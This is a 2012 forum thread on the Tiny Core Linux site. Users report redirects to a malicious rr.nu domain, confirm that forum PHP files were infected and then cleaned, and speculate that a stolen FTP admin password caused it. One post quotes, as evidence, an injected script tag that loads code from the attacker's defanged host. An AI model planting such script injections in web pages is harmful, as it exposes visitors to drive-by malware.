Author Topic: Tinycore site possibly compromized? (Read 828 times)

u54749 · « **on:** March 04, 2012, 12:07:46 PM »

I got a couple of random redirects from the Tinycore site to hXXp://rmore79riveru.rr.nu today.

see also
http://blog.sucuri.net/2012/02/malware-campaign-from-rr-nu.html
http://www.haruhisuzumiya.net/haruhiforum//viewtopic.php?t=2108

as extra proof:
Download attachment "udev.log" from http://forum.tinycorelinux.net/index.php/topic,11396.msg60347.html#msg60347

it has a very suspect last line that absolutely does not belong in a log file. I suppose this line was not present in the originally uploaded file.
the line is:
"<script src="hXXp://rmore79riveru.rr.nu/nl.php?p=d"></script>"

Can somebody reconstruct/confirm this?

gutmensch · « **Reply #1 on:** March 05, 2012, 07:33:58 AM »

Many thanks for the pointer, this rr.nu redirection was indeed in many of the forum php files, which should be clean now... attachments seem to be clean as well, at least I didn't find any reference to rr.nu in them any more, so it must have been delivered while accessing and downloading them.

bmarkus · « **Reply #2 on:** March 05, 2012, 07:58:44 AM »

Quote from: gutmensch on March 05, 2012, 07:33:58 AM

Many thanks for the pointer, this rr.nu redirection was indeed in many of the forum php files, which should be clean now... attachments seem to be clean as well, at least I didn't find any reference to rr.nu in them any more, so it must have been delivered while accessing and downloading them.

Do you know how these files got infected?

gutmensch · « **Reply #3 on:** March 05, 2012, 08:05:51 AM »

Quote from: bmarkus on March 05, 2012, 07:58:44 AM

Do you know how these files got infected?

Nope. But it seems to have hit also wordpress and other php based installations... so I would guess it's got something to do with an admin account and maybe a hacked browser/OS, which triggers some "nice" update functions within SMF itself to spread the malware.

bmarkus · « **Reply #4 on:** March 05, 2012, 08:42:56 AM »

Quote from: gutmensch on March 05, 2012, 08:05:51 AM

Quote from: bmarkus on March 05, 2012, 07:58:44 AM
Do you know how these files got infected?
Nope. But it seems to have hit also wordpress and other php based installations... so I would guess it's got something to do with an admin account and maybe a hacked browser/OS, which triggers some "nice" update functions within SMF itself to spread the malware.

I had frequent infection a year ago with my SMF and other sites. In fact everything was infected and according to modification time simply in ABC order. Code attached to HTML was working (I mean as virus creator wanted), PHP got only demaged. It was easy to clean with a simply Python program but it was reinfected soon.

In my case ftp admin password was stolen and simly it logged in from outside with ftp. I can't prove, but most likely a worm have stolen my admin password from Total Commander. Since I changed admin password and do not store it in FTP clients, my sites are clean and never got infected.

Tiny Core Linux

News:

Author Topic: Tinycore site possibly compromized? (Read 828 times)

u54749

Tinycore site possibly compromized?

gutmensch

Re: Tinycore site possibly compromized?

bmarkus

Re: Tinycore site possibly compromized?

gutmensch

Re: Tinycore site possibly compromized?

bmarkus

Re: Tinycore site possibly compromized?